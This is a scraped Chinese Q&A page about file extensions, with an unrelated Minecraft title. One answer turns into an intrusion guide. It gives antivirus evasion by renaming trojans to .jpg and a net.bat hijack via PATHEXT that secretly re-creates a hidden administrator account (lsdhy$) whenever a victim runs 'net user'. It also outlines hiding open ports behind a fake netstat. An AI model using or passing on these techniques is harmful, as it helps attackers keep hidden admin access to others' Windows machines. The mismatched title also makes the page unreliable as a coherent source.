我的世界全自动升降机:好人、文明人进来``````

来源:百度文库 编辑:高校问答 时间:2024/05/03 09:22:28
文件夹后缀名有几种啊,含意呢?``谢谢了``

任何一个程序的全名都是:前缀 . 后缀。前缀是程序的名字,而后缀就是表示文件的类型。当我们打开一个文件的时候,windows也会根据后缀名调用相应的程序打开它。看不到后缀名的朋友可以通过菜单“工具”-->文件夹选项-->查看-->隐藏已知的文件类型的扩展名,不选这一项,就可以看到文件的后缀名了!
其实这就是windows根据文件关联做出的处理了!大家可以通过使用cmd命令:assoc (有一个空格).exe(改成相应的后缀名即可)来查询相应后缀名所关联的文件是什么。当然我们也可以设置文件的关联。有一些木马程序运行了以后会恶意地将exe文件的关联修改。现在我告诉大家一个解决方法:首先将cmd.exe改名为:cmd.com,然后执行cmd命令:assoc (有一个空格).exe=exefile,这样就可以将被修改的exe关联修改回来了!
我们要了解一个概念,那就是:优先级目录以及优先级后缀名。当我们使用了缺省型的文件名的时候,windows会从优先级目录下寻找优先后缀名的文件,如果找到了,则打开,否则就报错。大家可以使用cmd命令:set path来查看优先级目录;set pathext来查看优先级后缀名。一般来说,优先级目录会是:C:\WINDOWS\system32;C:\WINDOWS、优先级后缀名一般为:.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH。
其实巧妙地使用后缀名,可以大大方便我们的入侵。现在我举两个简单的例子:
Cmd有一个特别的性质,那就是无论使用cmd执行任何一个程序,cmd都会先尝试使用.com的格式运行程序,要是出现错误才会使用关联的程序运行它,这样我们就可以将木马程序的后缀名改成.jpg或者其他的后缀名,在通过cmd执行它,因为有一些杀毒软件不会对.jpg的文件进行查杀,所以,这种方法不逊为一种木马防杀的好技术。
现在我们做一个简单的隐藏用户的方法。我们先来看看windows是如何执行net user命令的吧~!当我们使用cmd命令:net user的时候,为什么会出现用户情况的结果呢?其实user只是net.exe文件所带的一个参数,net.exe文件的目录在:c:\windows\system32目录下。windows之所以可以找到net.exe文件就是因为c:\windows\system32文件夹是优先级目录,windows会先从优先级目录下寻找的以优先级后缀名为后缀名的文件。优先级后缀名还有一个作用就是当优先级目录下有好几个相同名字的文件时,windows就会根据优先级后缀名的先后来打开文件的!
那么,如果当对方使用cmd命令:net user时,windows所找到的程序并不是net.exe,而是我们想打开的程序,也就可以做到隐藏用户的作用了,因为输出的结果都是我们说了算的啦~!好了,我们来实践一下吧!!
首先,使用cmd命令:set pathext=.COM;.BAT;.EXE;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH,就是将.bat放在.exe之前,然后再在C:\windows\system32目录下建立一个net.bat的文件,并加入如下内容:
@echo off =>关闭回显
@net user lsdhy$ /del =>先将lsdhy$用户删除
@C:\windows\system32\net.exe %1 %2 %3 %4 =>执行输入的命令
@net user lsdhy$ lsdhy /add =>添加用户lsdhy$
@net localgroup Adminstrators lsdhy$ /add =>将lsdhy$加如到管理员组
这样,当对方使用:net user的时候,由于优先级后缀名中,bat在exe之前,所以,我们的程序会被先执行了!!
至于隐藏端口之类的方法,大家可以自己去实验一下。我对隐藏端口提一个简单的思路。
首先建立一个netstat.bat的文件,它就可以将netstat -an的输出结果写如一个文件夹,然后调用下面的那个exe文件对它进行处理,之后在调用另一个bat文件(是以下的exe文件所生成的文件)。
同时加入一个exe文件,它的作用就是处理原来得出的结果,将我们想隐藏的信息排除掉,再写入到一个bat的文件。
当这个exe文件执行完了以后,就会执行另一个bat的文件了,也就是起到了输出的作用啦!

楼上的兄弟,楼主问的是 文件夹的后缀名哦,不是 文件后缀名哦~~~~

可以在我的电脑-工具-文件夹选项-文件类型 中查看

应该就一种

文件后缀名查询器
你有这个软件查一下,就什么都知道了,其中的程序就是EXE的后缀名,